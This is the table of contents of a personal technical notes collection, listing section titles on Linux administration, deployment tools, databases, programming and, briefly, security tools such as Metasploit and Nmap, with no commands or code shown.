<<

Omid Raha MyStack Documentation Release 0.1

Omid Raha

Oct 28, 2019

Contents

1 Aircrack-ng 3 1.1 Install...... 3 1.1.1 Install aircrack-ng 1.2-beta1 from source...... 3

2 APPLE 5 2.1 Tips...... 5 2.1.1 Apple ID...... 5 2.1.2 Hackintosh...... 5

3 Astronomy 7 3.1 astronomical unit (AU, or au)...... 7 3.2 What Is the Distance Between Earth and Mars?...... 7 3.3 What is the Distance to the Moon?...... 7 3.4 What Is the Distance Between Earth and sun?...... 7 3.5 ...... 8 3.6 Galaxy...... 8

4 Atlassian 9 4.1 Tips...... 9 4.1.1 Atlassian installation approach...... 9 4.1.2 Atlassian license Prices...... 10 4.1.3 Run Jira with docker...... 11 4.1.4 Run Confluence with docker...... 12 4.1.5 Run Bitbucket Server with docker...... 12 4.1.6 JIRA is Unable to Start due to Could not create necessary subdirectory...... 12 4.1.7 Atlassian Docker compose file...... 13 4.1.8 Backup atlassian product...... 15 4.1.9 Bamboo...... 16

5 benchmark 17 5.1 Tips...... 17 5.1.1 Using Apache Bench for Simple Load Testing...... 17

6 Block Chain 19 6.1 Tips...... 19 6.2 Ethereum...... 19 6.2.1 Solidity...... 21

i 6.2.2 Online solidity...... 21 6.2.3 Links...... 21

7 Browser 23 7.1 ...... 23 7.1.1 Disable Dns Cache...... 23 7.1.2 Increase download them all maximum segments...... 23 7.1.3 Set security tls...... 24 7.1.4 Disable automatic loading of Images in Firefox...... 24 7.1.5 Fix Firefox Phishing...... 24 7.2 ...... 24

8 25

9 Citus 27 9.1 Tips...... 27 9.1.1 Install citus on single machine with docker...... 27 9.1.2 Install citus on a single machine on ubuntu...... 28 9.1.3 Install citus on multi-machine cluster on Ubuntu...... 29 9.1.4 Have a unique constraint on one field of table...... 30 9.1.5 Limitation of Citus Community...... 30 9.1.6 Django...... 31

10 CockRoachDB 33 10.1 Tips...... 33 10.1.1 NewSql...... 33 10.1.2 Support SQL and Postgres...... 33 10.1.3 Support Django...... 33 10.1.4 Support k8s...... 34 10.1.5 Scale...... 34 10.1.6 Performance...... 34 10.1.7 Deploy multi-node cluster using HAProxy load balancer...... 34 10.1.8 Adapting SQLAlchemy to CockroachDB...... 34

11 Cothority 35 11.1 Tips...... 35 11.1.1 Install...... 35 11.1.2 Apps...... 37

12 Crypto currency 47 12.1 Tips...... 47 12.1.1 Create your own block chain...... 47 12.1.2 Coins Analysis...... 47 12.1.3 Exchange coins...... 47 12.1.4 Buy/Sell coins...... 48 12.1.5 Buy coins by Paypal...... 48 12.1.6 Tools...... 48 12.1.7 Python...... 48 12.1.8 Bitcoin...... 48 12.1.9 Universal JavaScript Client-Side Wallet Generator...... 48 12.1.10 NXT...... 49 12.1.11 Dogecoin...... 49 12.1.12 Ripple XRP...... 50 12.1.13 Cloud Mining...... 50 12.2 Mining...... 50 ii 12.2.1 Mining software...... 50 12.2.2 Pool...... 51 12.2.3 Hash Rate...... 52 12.2.4 Best coin to mine...... 52

13 CTF 53 13.1 Tips...... 53 13.1.1 Tools...... 53

14 Deploy 55 14.1 Open shift...... 55 14.1.1 Installing the OpenShift Client Tools...... 55 14.1.2 Django admin pass...... 57 14.1.3 Openshift Environment Variables List...... 57 14.1.4 Update rhc...... 57 14.1.5 How to create and unset environment variables on the server ?...... 57 14.1.6 Restart the application...... 57 14.1.7 Using redmine on openshift...... 58 14.1.8 Payment...... 58 14.1.9 To see where an existing application is being hosting...... 58 14.2 Amazon...... 58 14.2.1 RDS...... 63 14.2.2 EC2 Container Service...... 64 14.3 Configuration management...... 65 14.3.1 configuration management...... 65 14.4 Tips...... 65 14.4.1 PaaS (platform as a service)...... 65 14.4.2 VPS Provider...... 65 14.4.3 Digital Ocean...... 66 14.4.4 Amazon...... 66 14.4.5 Blue Green Deployment...... 67 14.4.6 Continuous Delivery...... 67 14.4.7 Continuous Integration...... 67 14.4.8 Feature toggle...... 67 14.4.9 Log collection service...... 67 14.4.10 How to configure Client Id and Google Client Secret?...... 68 14.4.11 Kong with docker...... 68 14.4.12 Combine and minimize JavaScript, CSS and Images files...... 69 14.5 Vagrant...... 69 14.5.1 Quick Guide to Vagrant on Amazon EC2...... 69 14.5.2 How to use vagrant in a proxy enviroment?...... 69 14.5.3 Disable or remove the proxy...... 69 14.5.4 Install ubuntu...... 70 14.5.5 Multi-Machine...... 70 14.5.6 CPU and Memory...... 70 14.5.7 Update plugin...... 70 14.6 Monitoring Tools...... 70 14.6.1 New Relic...... 70 14.6.2 What is bam.nr-data.net...... 71 14.6.3 How to install New Relic plugin...... 71 14.6.4 Real-time web log analyzer and interactive viewer...... 72 14.7 Ansible...... 72 14.7.1 Install...... 73 14.8 Microservices...... 73

iii 14.8.1 Multiple Services Per Host...... 73 14.8.2 Single Service Per Host...... 74 14.8.3 Mantl...... 74 14.8.4 lattice...... 75 14.8.5 vamp...... 75 14.8.6 ...... 75 14.8.7 marathon...... 75 14.8.8 terraform...... 75 14.9 Simple Storage Service (S3)...... 75 14.9.1 S3cmd configuration to use with Swift storage object...... 75 14.9.2 Sync remote s3 objects to the local file system...... 76 14.10 VPS services...... 76 14.10.1 VPS with more Storage...... 76 14.10.2 Cheap VPS...... 76 14.11 ...... 76 14.11.1 Monitoring...... 78 14.11.2 Running Kubernetes Locally via Minikube...... 78 14.11.3 Guestbook Example...... 82 14.11.4 Service Discovery...... 82 14.11.5 Install kubectl binary via curl...... 82 14.11.6 Interactive K8S starting guide...... 83 14.11.7 Tutorials...... 84 14.11.8 Working with kubectl...... 84 14.11.9 Difference between targetPort and port in kubernetes Service definition...... 90 14.11.10Sample Project...... 90 14.11.11Deploy a docker registry in the kubernetes cluster and configure Ingress with Let’s Encrypt. 90 14.11.12Deploy a docker registry without TLS is the kubernetes cluster...... 91 14.11.13Configure docker service to use local insecure registry...... 93 14.11.14Delete images from a private local docker registry...... 94 14.11.15Assigning Pods to Nodes...... 94 14.12 Rancher...... 95 14.12.1 Install...... 95 14.12.2 Setting Up a Rancher...... 96 14.12.3 Resiliency Planes...... 96 14.12.4 Backup Rancher server data...... 97 14.12.5 Links...... 97 14.13 Rook...... 97 14.13.1 Deploy CephFS on kubernetes with rook...... 97 14.14 Etcd...... 99 14.15 Patroni...... 100 14.16 Ignite...... 100 14.16.1 Run ignite as docker...... 100 14.16.2 Connect to ignite as memcache with python...... 100 14.16.3 Enable HTTP rest API...... 100 14.16.4 Ignite Configuration...... 101 14.16.5 Sample Ingnite configuration file...... 102 14.17 Function as a service (FaaS)...... 103 14.17.1 faas...... 103 14.17.2 kubeless...... 103 14.17.3 fission...... 103

15 Dictionary 105 15.1 Words...... 105 15.2 Terminology...... 108

iv 15.3 Abbreviation...... 109

16 Django 111 16.1 Tips...... 111 16.1.1 Create new project...... 111 16.1.2 Using django in python cmd...... 111 16.1.3 Migration...... 111 16.1.4 Django dump data of django.contrib.auth.Group...... 111 16.1.5 Django migration for auth...... 112 16.1.6 how to reset django admin password?...... 112 16.1.7 Run server from Python script...... 112 16.1.8 Static files handling...... 113 16.1.9 Get the static files URL in view...... 113 16.1.10 Testing email sending...... 113 16.1.11 Django rest...... 114 16.1.12 Django supported versions...... 114 16.1.13 Translation...... 114 16.1.14 Django User Group Object Permissions...... 114 16.2 Modules...... 115 16.2.1 Model Fields...... 115

17 117 17.1 Crypt setup...... 117 17.2 Encrypt home directory with cryptsetup module...... 117 17.3 TrueCrypt...... 119

18 ffmpeg 121 18.1 tips...... 121 18.1.1 Cmds...... 121 18.1.2 Compile...... 122 18.1.3 Links...... 122 18.1.4 How to Watermark an image into the video...... 123

19 Game 125 19.1 Game...... 125 19.1.1 bzflag...... 125

20 Go-Lang 127 20.1 Tips...... 127 20.1.1 Builtin function...... 127 20.1.2 Introduction to go programming language...... 127 20.1.3 SET the GOPATH and GOROOT environments...... 128

21 129 21.1 Tips...... 129 21.1.1 Install Gunicorn...... 129 21.1.2 Gunicorn config settings...... 129 21.1.3 How Many Workers?...... 129 21.1.4 Choosing a Worker Type...... 130 21.1.5 Worker Processes...... 130 21.1.6 Running Django with Gunicorn - Best Practice...... 130 21.1.7 Can’t get access log to work for gunicorn...... 131 21.1.8 Serving a gunicorn app with PyInstaller...... 131 21.1.9 Serving a pycnic app with gunicorn with PyInstaller...... 131

v 22 HAPROXY 133 22.1 Tips...... 133 22.1.1 Haproxy with docker...... 133 22.1.2 Dynamic Backend...... 135

23 HTTP 137 23.1 Tips...... 137 23.1.1 HTTP persistent connection...... 137 23.2 HTTP access control (CORS)...... 137 23.3 HTTP Codes...... 138 23.3.1 204 No Content...... 138 23.3.2 301 Moved permanently...... 138 23.3.3 302 Moved temporarily...... 138 23.3.4 304 Not Modified...... 138 23.3.5 410 HTTP Error Gone...... 138 23.3.6 500 Internal server error...... 139 23.3.7 502 Bad Gateway...... 139 23.3.8 504 Gateway Timeout...... 139 23.3.9 509 Bandwidth Limit Exceeded...... 139

24 IP 141 24.1 Tips...... 141 24.1.1 Open one port...... 141

25 InterPlanetary (IPFS) 143 25.1 Tips...... 143 25.1.1 Public IPFS Gateways...... 143 25.1.2 Docker usage...... 143 25.1.3 Python usage...... 144

26 IRC 145 26.1 Tips...... 145

27 147 27.1 Tips...... 147 27.1.1 How to install Oracle Java...... 147 27.1.2 Install Java on ubuntu...... 147 27.1.3 Switch between installed java...... 148 27.2 Introduction to java programming language...... 148 27.2.1 In Java, what’s the difference between public, default, protected, and private?...... 148 27.2.2 When should I use “this” in a class?...... 148 27.2.3 Understanding constructors...... 149

28 Java Script 151 28.1 Tips...... 151 28.1.1 Installing Bower...... 151 28.2 ExtJS...... 151 28.2.1 Sencha Cmd...... 151

29 Latex 153 29.1 Tips...... 153 29.1.1 Write Persian in Latex...... 153

30 155 30.1 Cmds...... 155 vi 30.1.1 Add User...... 155 30.1.2 Delete a User...... 155 30.1.3 Changing User Password...... 155 30.1.4 Allowing other users to run sudo...... 156 30.1.5 Delete a user from one group...... 156 30.1.6 Remove sudo privileges from a user (without deleting the user)...... 156 30.1.7 Users and Groups name list...... 156 30.1.8 apt-file search...... 156 30.1.9 mtu...... 156 30.1.10 dpkg-reconfigure...... 156 30.1.11 rfkill...... 157 30.1.12 Run wireshark with capture packets privilege...... 157 30.1.13 Install, Remove, Purge and get Info of Packages...... 158 30.1.14 Create A Local Debian Mirror With apt-mirror...... 158 30.1.15 Named pipe...... 159 30.1.16 Give Privilege to a non-root process to bind to ports under 1024...... 159 30.1.17 How do I test whether a number is prime?...... 159 30.1.18 Download from YouTube...... 159 30.1.19 How to use -dl from a python program...... 160 30.1.20 Download Youtube videos with Youtube subtitles on...... 160 30.1.21 Redirect output to null...... 160 30.1.22 cron...... 160 30.1.23 Generate random base64 characters...... 161 30.1.24 Set Socket Buffer Sizes...... 162 30.1.25 Ping...... 162 30.1.26 Change owner of directory...... 162 30.1.27 Locate/print block device attributes...... 162 30.1.28 Create a new UUID value...... 162 30.1.29 SSH...... 162 30.1.30 Secure copy...... 163 30.1.31 Install SSH server and SSH client...... 163 30.1.32 Create a new ssh key...... 163 30.1.33 SSH connection with public key...... 163 30.1.34 Disable the Password for Root Login...... 163 30.1.35 Youtube download trick...... 163 30.1.36 Run process as background and never die...... 164 30.1.37 Eject CD/DVD-ROM...... 164 30.1.38 Search for a package...... 164 30.1.39 Un mount cd-rom device that is busy error...... 164 30.1.40 Login with linux FTP username and password...... 164 30.1.41 Download torrent...... 164 30.1.42 Debug SSH...... 164 30.1.43 Detect ssh authentication types available...... 165 30.1.44 Avoid SSH’s host verification for known hosts?...... 165 30.1.45 Set environment variables on linux...... 165 30.1.46 Base64 decode encode...... 165 30.1.47 Extract compressed files...... 165 30.1.48 List All Environment Variables...... 166 30.1.49 Set Environment variable...... 167 30.1.50 Set proxy in command line...... 167 30.1.51 How can I tunnel all of my network traffic through SSH?...... 167 30.1.52 How can you completely remove a package?...... 167 30.1.53 How to forward X over SSH from Ubuntu machine ...... 167 30.1.54 SOCKS server and/or client...... 168

vii 30.1.55 SSH hangs on debug1: expecting SSH2_MSG_KEX_ECDH_REPLY...... 168 30.1.56 What will this command do?...... 168 30.1.57 Sample guake script...... 169 30.1.58 Verify that apt is pulling from the right repository...... 169 30.1.59 Operation not permitted on file with root access...... 170 30.1.60 and sudo over SSH...... 170 30.1.61 How to backup with rsync...... 171 30.1.62 Full Daily Backup with Syncing Hourly Backup by rsync and cron...... 171 30.1.63 Backup with rsync works but not in crontab...... 171 30.1.64 Sample ssh config file...... 172 30.1.65 Compress directory...... 172 30.1.66 How to add path of a program to $PATH environment variable?...... 172 30.1.67 Could not open a connection to your authentication agent...... 172 30.1.68 How do I make ls show file sizes in megabytes?...... 173 30.1.69 How to check one file exist on specific path ?...... 173 30.1.70 what does echo $$, $? $# mean ?...... 173 30.1.71 Make ZSH the default shell...... 173 30.1.72 ulimit...... 173 30.1.73 locate...... 174 30.1.74 Posting Form Data with cURL...... 174 30.1.75 Diff...... 174 30.1.76 Telegram...... 174 30.1.77 Convert Socks into an HTTP proxy...... 174 30.1.78 How to use sshuttle...... 175 30.1.79 locale.Error: unsupported locale setting...... 175 30.1.80 Shadowsocks...... 175 30.1.81 Capture and recording screen...... 175 30.1.82 Watches Limit...... 175 30.1.83 Monitor multiple remote log files with MultiTail...... 176 30.1.84 Register GPG key by curl instead of dirmngr...... 176 30.1.85 Install fonts...... 176 30.1.86 Install tzdata noninteractive...... 177 30.1.87 Inotify Watches Limit...... 177 30.2 Network...... 177 30.2.1 Watch network connections...... 177 30.2.2 Established connections...... 177 30.2.3 Tcp connections...... 177 30.2.4 Connections with PIDs...... 177 30.2.5 List of listening ports...... 178 30.2.6 Capture packets...... 178 30.2.7 Change the default gateway...... 178 30.2.8 Set a static IP...... 178 30.2.9 How do I install dig?...... 178 30.2.10 Monitor bandwidth usage per process...... 179 30.2.11 Show your gateway...... 179 30.2.12 Disable IP6...... 179 30.2.13 Number of open connections per ip...... 179 30.2.14 Connections types:...... 179 30.3 Hard...... 180 30.3.1 Commands to check hard disk partitions and disk space on Linux...... 180 30.3.2 How to check Swap space in Linux...... 181 30.3.3 Create iso image for swap...... 182 30.3.4 Remove swap...... 182 30.3.5 Mount and UnMount usb...... 182 viii 30.3.6 What is a ?...... 182 30.3.7 What is a ?...... 183 30.3.8 Summarize disk usage of each FILE, recursively for directories...... 183 30.3.9 Clean NTFS partition for windows cache files...... 184 30.3.10 Make sub directory...... 184 30.3.11 How to Sort Folders by Size With One Command Line in Linux...... 184 30.3.12 How to Free Up a Lot of Disk Space by Deleting Cached Package ...... 184 30.3.13 Mount unknown filesystem ...... 185 30.4 Memory...... 185 30.4.1 How to see system and process memory usage...... 185 30.5 CPU and Process...... 185 30.5.1 Display a tree of processes...... 185 30.6 GPU...... 185 30.6.1 How to measure GPU usage?...... 185 30.6.2 Windows...... 186 30.7 LDAP...... 186 30.7.1 Install LDAP packages...... 186 30.7.2 Configure LDAP package...... 186 30.7.3 Initial LDAP configuration...... 189 30.7.4 Initial test...... 189 30.7.5 Creating basic tree structure...... 189 30.7.6 Load the LDIF file into the server...... 189 30.7.7 Test LDIF...... 190 30.7.8 Creating user accounts...... 190 30.7.9 Load the LDIF file into the server...... 190 30.7.10 To define the new user’s password...... 190 30.7.11 Verify the user entry has been created...... 190 30.7.12 Sample python code to test...... 190 30.8 Cent OS...... 190 30.8.1 EPEL...... 190 30.9 Debian...... 191 30.9.1 Removed unused packages...... 191 30.9.2 Annoying autorenaming in Guake...... 191 30.9.3 How do you uninstall a library in Linux?...... 191 30.9.4 Thunderbird...... 192 30.9.5 Yandex Setting up mail clients...... 192 30.9.6 How to adjust screen lock settings on Linux debian desktop...... 192 30.9.7 How to install on Debian...... 192 30.9.8 Restarting Networking...... 192 30.9.9 Package manager is locked...... 192 30.9.10 Some index files failed to download...... 192 30.10 Ubuntu...... 193 30.10.1 Ubuntu Server...... 193 30.10.2 SSH only allows public key authentication when you first login with password...... 193 30.10.3 Checks the Ubuntu version...... 193 30.10.4 ubuntu UFW...... 194 30.10.5 Connect to wireless network manually...... 194 30.10.6 Make apt-get not prompt for replacement of configuration files...... 195 30.10.7 Upgrade from Ubuntu 16.0.4 to Ubuntu Linux 18.04...... 195 30.11 ...... 196 30.12 DNS...... 196 30.12.1 Transparent DNS proxies...... 196 30.12.2 DNSCrypt...... 196 30.12.3 -proxy...... 196

ix 30.12.4 resolveconf...... 198 30.12.5 dnssec-trigger and unbound...... 198 30.12.6 How do install dig?...... 198 30.12.7 Disable builtin dnsmasq on the network manager...... 198 30.12.8 Deploying a DNS Server using Docker...... 199 30.13 Libreo Office...... 200 30.13.1 How to change the text direction in LibreOffice?...... 200 30.14 Webdav...... 201 30.15 Remote Desktop...... 201 30.15.1 Configure users to connect to Debian from a Windows machine using Remote Desktop... 201 30.16 Wireless...... 201 30.16.1 unifi...... 201

31 Machine Learning 205 31.1 Tips...... 205 31.1.1 Optical mark recognition (OMR)...... 205

32 Hg Mercurial 207 32.1 Tips...... 207 32.1.1 Sample .hgignore file...... 207 32.2 Plugins...... 208 32.2.1 Hg edit history plugin...... 208

33 Metasploit 209 33.1 Tips...... 209 33.1.1 Configure db...... 209 33.1.2 SSH Username Enumeration...... 210 33.1.3 Anonymous FTP Access Detection...... 210 33.1.4 FTP Version Scanner...... 210 33.1.5 SMTP User Enumeration Utility...... 210 33.1.6 SMTP Open Relay Detection...... 211 33.1.7 SMTP Banner Grabber...... 211 33.1.8 MS03-026 Microsoft RPC DCOM Interface Overflow...... 211 33.1.9 Docker file...... 211

34 Mobile Programming 213 34.1 Tips...... 213 34.1.1 Push notification...... 214 34.2 Sencha Touch...... 214 34.2.1 Native Packaging for Mobile Devices...... 214 34.2.2 Creating a New Application...... 214 34.2.3 Deploying Your Application...... 214 34.3 Android...... 215 34.3.1 Get the Android SDK...... 215 34.3.2 Android NDK...... 215 34.3.3 API Level...... 215 34.3.4 Using adb command...... 215 34.3.5 Using Android in ...... 215 34.3.6 Force Android RTL...... 216 34.3.7 Before Using Android IDE...... 216 34.3.8 List_of custom Android distributions...... 216 34.4 Kivy...... 216 34.4.1 Using kivy...... 216 34.4.2 Ebook...... 217 34.4.3 Resources...... 217

x 34.4.4 RTL support issues...... 217 34.4.5 APK big size issues...... 217 34.5 ...... 217 34.5.1 Flutter with high performance compare with and Native...... 217 34.5.2 Native apps (Java/Swift)...... 218 34.5.3 React Native apps (Javascript)...... 218 34.5.4 Flutter apps (Dart)...... 219

35 MongoDB 221 35.1 Indexes...... 221 35.1.1 Unique Indexes...... 221 35.1.2 Sparce Indexes...... 221 35.1.3 Create Indexes, Drop Indexes , Get Indexes Info...... 222 35.1.4 Building Indexes...... 223 35.1.5 Background indexing...... 224 35.1.6 Offline indexing...... 224 35.1.7 Backups...... 224 35.1.8 The order of fields in an index...... 224 35.1.9 Covered query...... 225 35.1.10 Selectivity index...... 225 35.1.11 Use Indexes to Sort Query Results...... 225 35.2 Queries...... 226 35.2.1 Identifying slow queries...... 226 35.2.2 .explain()...... 226 35.2.3 When mongo queries plan expired...... 227 35.2.4 Query Operations that Cannot Use Indexes Effectively...... 227 35.3 Collections...... 227 35.3.1 Capped collection...... 227 35.3.2 Use Natural Order for Fast Reads...... 227 35.4 Sharding...... 228 35.5 Memory...... 228 35.5.1 Working set...... 228 35.5.2 Must my working set size fit RAM?...... 228 35.5.3 How do I calculate how much RAM I need for my application?...... 228 35.5.4 How do I read memory statistics in the top command...... 229 35.5.5 Ensure Indexes Fit RAM...... 229 35.5.6 Indexes that Hold Only Recent Values in RAM...... 229 35.6 Errors...... 229 35.7 ReplicaSet...... 229 35.7.1 Scaling reads with secondaries isn’t practical if any of the following apply...... 230 35.7.2 Configure a Delayed Replica Set Member...... 230 35.7.3 Replica sets Setup...... 230 35.7.4 Cmds...... 235 35.8 Locks...... 236 35.8.1 Path of mongobd lock...... 236 35.9 Forks...... 236 35.9.1 tokumx...... 236 35.10 Tools...... 236 35.10.1 mongosniff...... 236 35.11 Cmds...... 236 35.11.1 How can I check the size of a collection?...... 236 35.11.2 How can I check the size of indexes?...... 237 35.12 Monitoring...... 237

xi 36 Nginx 239 36.1 Tips...... 239 36.1.1 Install Module...... 239 36.1.2 Change default welcome page of nginx...... 239 36.1.3 Nginx with Docker...... 239 36.1.4 Nginx config file...... 240 36.1.5 Nginx customize error pages...... 241 36.1.6 Nginx maintenance mode...... 241 36.1.7 How to restrict access to directory and sub directories...... 242 36.1.8 Enable Nginx Status Page...... 242 36.1.9 Tuning Nginx...... 243 36.1.10 Load testing...... 246 36.1.11 JMeter...... 247 36.1.12 Linux TCP/IP tuning for scalability...... 247 36.1.13 What is a Reverse Proxy vs. Load Balancer?...... 247 36.1.14 Load balancing haproxy and nginx...... 249 36.1.15 Nginx vs Varnish...... 251 36.1.16 An Introduction to HAProxy and Load Balancing Concepts...... 251 36.1.17 Redundant load balancers?...... 251 36.1.18 nginx automatic failover load balancing...... 252 36.1.19 Building a Load Balancer with LVS - Linux Virtual Server...... 252 36.1.20 Building A Highly Available Nginx Reverse-Proxy Using Heartbeat...... 252 36.1.21 Building a Highly-Available Load Balancer with Nginx and Keepalived on CentOS..... 252 36.1.22 HAProxy as a static reverse proxy for Docker containers...... 252 36.1.23 How to setup HAProxy as Load Balancer for Nginx on CentOS 7...... 252 36.1.24 Building a Load-Balancing Cluster with LVS...... 252 36.1.25 Doing Some local benchmark with Nginx...... 252 36.1.26 apache benchmark...... 255 36.1.27 HTTP Keepalive Connections and Web Performance | NGINX...... 256 36.1.28 Nginx Caching...... 256 36.1.29 Optimizing NGINX Speed for Serving Content...... 256 36.1.30 Fastest server for static files serving...... 257 36.1.31 Sample Nginx load balancing...... 257

37 Nmap 261 37.1 Scan Options...... 261 37.1.1 Find open Proxies...... 261

38 NodeJS 263 38.1 Tips...... 263 38.1.1 run npm command gives error “/usr/bin/env: node: No such file or directory”...... 263 38.1.2 Grunt “Command Not Found” Error in Terminal...... 263

39 Notes 265 39.1 Tips...... 265 39.2 Terminology...... 265 39.3 Bookmarks...... 265 39.3.1 Decoder...... 265 39.3.2 Dns Online Tools...... 265 39.3.3 Online Virus Check...... 266 39.3.4 Browser Security Check...... 266 39.3.5 Temporary Email Address...... 266 39.3.6 Css compressor...... 266 39.3.7 Online compiler and executable for codes...... 266

xii 39.3.8 Character references...... 266 39.3.9 Malware Analysis for Unknown Binaries...... 267 39.3.10 Blog security...... 267 39.3.11 Online device search engine...... 267 39.3.12 Online Pentest Tools...... 267 39.3.13 Robtex Swiss Army Knife Internet Tool...... 267

40 269 40.1 Tips...... 269 40.1.1 Install Module...... 269

41 Piano 271 41.1 Tips...... 271 41.1.1 Setting up Virtual MIDI Piano Keyboard in Ubuntu...... 271

42 PostgreSQL 273 42.1 Tips...... 273 42.1.1 fix psql: FATAL: role “” does not exist error...... 273 42.1.2 List all databases...... 273 42.1.3 list user accounts...... 274 42.1.4 CREATE Database...... 274 42.1.5 Add or create a user account and grant permission for database...... 274 42.1.6 Get the Size of a Postgres Table...... 274 42.1.7 Quit from psql...... 275 42.1.8 Connect to postgres from bash...... 275 42.1.9 Allow localhost to connect to postgres without password checking...... 275 42.1.10 Postgres on Docker...... 275 42.1.11 Difference between Warm, hot standby and Streaming Replication:...... 277 42.1.12 Zero to PostgreSQL streaming replication in 10 mins...... 277 42.1.13 Understanding and controlling crash recovery...... 277 42.1.14 Synchronous Replication...... 278 42.1.15 When will PostgreSQL execute archive_command to archive wal files?...... 279 42.1.16 Binary Replication Tools...... 279 42.1.17 warm standby or log shipping...... 280 42.1.18 Streaming Replication...... 280 42.1.19 Introduction to Binary Replication...... 280 42.1.20 PITR...... 280 42.1.21 Warm Standby...... 281 42.1.22 Hot Standby...... 281 42.1.23 Streaming Replication...... 281 42.1.24 Safe way to check for PostgreSQL replication delay/lag...... 281 42.1.25 Does PostgreSQL 9.1 Streaming Replication catch up after a lag without WAL archiving?. 282 42.1.26 archive_command...... 282 42.1.27 base backup...... 282 42.1.28 pg_basebackup...... 283 42.1.29 base backup...... 283 42.1.30 Postgres replica and docker...... 283 42.1.31 Backup Control Functions...... 283 42.1.32 PostgreSQL Streaming Replication...... 283 42.1.33 pg_basebackup vs pg_start_backup...... 284 42.1.34 Example of Standalone Hot Backups and recovery...... 284 42.1.35 Backup with pg_basebackup...... 285 42.1.36 Find Postgresql Version...... 286 42.1.37 Barman...... 286

xiii 42.1.38 pg_receivexlog...... 286 42.1.39 what are the pg_clog and pg_xlog directories ?...... 287 42.1.40 Getting WAL files from Barman with ‘get-wal’...... 287 42.1.41 verifying data consistency between two databases...... 288 42.1.42 How to check the replication delay in PostgreSQL?...... 288 42.1.43 Streaming replication slots in PostgreSQL 9.4...... 288 42.1.44 Continuous Archiving and Point-in-Time Recovery (PITR)...... 288 42.1.45 Point In Time Recovery From Backup using PostgreSQL Continuous Archving...... 288 42.1.46 Purpose of archiving in master?...... 289 42.1.47 Setting up file-based replication - deprecated...... 289 42.1.48 Setting up streaming replication...... 290 42.1.49 Difference between fsync and synchronous_commit ?...... 294 42.1.50 standby_mode...... 294 42.1.51 primary_conninfo...... 294 42.1.52 trigger_file...... 294 42.1.53 Testing a PostgreSQL slave/master cluster using Docker...... 295 42.1.54 Postgres streaming replication with docker...... 295 42.1.55 Show the value of a run-time parameter...... 296 42.1.56 Postgres DB Size Command...... 296 42.1.57 High Availability and Load Balancing...... 297 42.1.58 Replication...... 297 42.1.59 Multi-master replication...... 297 42.2 Backups...... 298 42.2.1 Barman...... 298 42.2.2 How To Backup and Restore PostgreSQL Database Using pg_dump and psql...... 298 42.3 Postgres-XL...... 298 42.4 Nodes Concept...... 298 42.5 Table distributing concept...... 299 42.6 Shard limitation...... 299 42.7 High Availability...... 300 42.8 Download...... 300 42.9 Setting up Postgres-XL cluster...... 300 42.9.1 Install Postgres-XL...... 300 42.9.2 Configure Postgres-XL...... 302 42.10 Docker...... 304 42.11 Ansible...... 304 42.12 Django...... 304 42.13 Links...... 304

43 Python 305 43.1 Tips...... 305 43.1.1 String in Python 2 and 3...... 305 43.1.2 OAUTH...... 305 43.1.3 Simple HTTP Server with Python...... 306 43.1.4 What exactly does the T and Z mean in timestamp?...... 306 43.2 Modules...... 306 43.2.1 Dict Validator...... 306 43.2.2 Schematics...... 307 43.2.3 libnotify...... 307 43.2.4 Terminal...... 308 43.2.5 Install lxml on pyenv (virtual env)...... 308 43.3 Doctest...... 308 43.3.1 Directives...... 308 43.4 South...... 309 xiv 43.4.1 Enable South for django apps(Converting existing apps)...... 309 43.4.2 Example of using South for a model...... 309 43.5 ...... 309 43.5.1 Install pip...... 309 43.5.2 Use mirror to install packages...... 309 43.5.3 virtualenv...... 309 43.5.4 pyenv...... 310 43.5.5 Fixed bz2 warnings...... 311 43.5.6 How do I install python-ldap in a virtualenv?...... 311 43.5.7 Install python modules without root access...... 311 43.5.8 Pip install from git repo branch...... 311 43.6 uWSGI...... 311 43.7 Debug & Log...... 312 43.7.1 Debug...... 312 43.7.2 Log...... 312 43.8 Async, Sync, Blocking, None-Blocking, Threads...... 312 43.9 Python Web frameworks...... 312 43.9.1 repoze...... 312 43.10 Supervisor...... 313 43.10.1 Step by step example...... 313 43.10.2 Links...... 314 43.11 Celery...... 314 43.11.1 How to disallow pickle serialization in celery?...... 314 43.11.2 Is CELERY_RESULT_BACKEND necessary?...... 314 43.11.3 Using Amazon SQS...... 315 43.11.4 Use celery with different code base in API and workers...... 315 43.11.5 Chain tasks on celery...... 315 43.12 PyInstaller...... 315 43.13 Package Windows binaries while running under Linux...... 315 43.13.1 Install Wine...... 316 43.13.2 Install Python...... 316 43.14 Selenium...... 316 43.15 robot framework...... 317

44 RabbitMQ 319 44.1 Introduction...... 319 44.2 Docker...... 319 44.3 Pika...... 320 44.3.1 Exchange...... 320 44.3.2 Publish...... 320 44.3.3 Queue...... 320 44.3.4 Bindings...... 320 44.3.5 Delete Queue...... 321 44.3.6 Delete Exchange...... 321

45 Redmine 323 45.1 Tips...... 323 45.1.1 Path of redmine plugins...... 323 45.1.2 How to install a new plugin...... 323 45.1.3 How to install CKEditor plugin for redmine...... 323 45.1.4 How to restart redmine...... 324 45.1.5 how to show code changes on issues...... 324 45.1.6 Backup Redmine...... 324 45.1.7 Setup redmine with docker image...... 325

xv 46 Research 327 46.1 Resource...... 327 46.1.1 What’s the best server distro ?...... 327

47 Ruby 329 47.1 Tips...... 329 47.1.1 Ruby environment...... 329

48 Security 331 48.1 Tips...... 331 48.1.1 List of Secure Email Providers that take Privacy Serious...... 331 48.1.2 How to create your own root key and root certificate...... 332 48.1.3 How to generate a certificate signing request (CSR)...... 333 48.1.4 Convert Client Key to PKCS...... 334 48.1.5 Mutual Authentication...... 334 48.1.6 Self Sign Authentication...... 342 48.1.7 Can I build my own Extended Validation (EV) SSL certificate?...... 342 48.1.8 Using shadowsocks...... 342 48.1.9 JSON Web Token...... 343 48.2 Links...... 343 48.2.1 Password list...... 343 48.2.2 XSS...... 343 48.2.3 Online exploit search...... 343 48.2.4 Search engine for Internet-connected device...... 343 48.3 Penetration...... 343 48.3.1 Penetration testing methodology...... 343

49 Metasploit 371 49.1 Tips...... 371 49.1.1 APDU command to get smart card uid...... 371

50 Sphinx 373 50.1 Tips...... 373 50.1.1 How do we embed images in sphinx docs?...... 373 50.1.2 Document your Django projects: reStructuredText and Sphinx...... 373 50.1.3 Generating Code Documentation With Pycco...... 373 50.1.4 First Steps with Sphinx...... 374 50.2 Links...... 374

51 Sport 375 51.1 Body Building...... 375 51.1.1 Natural body building...... 375

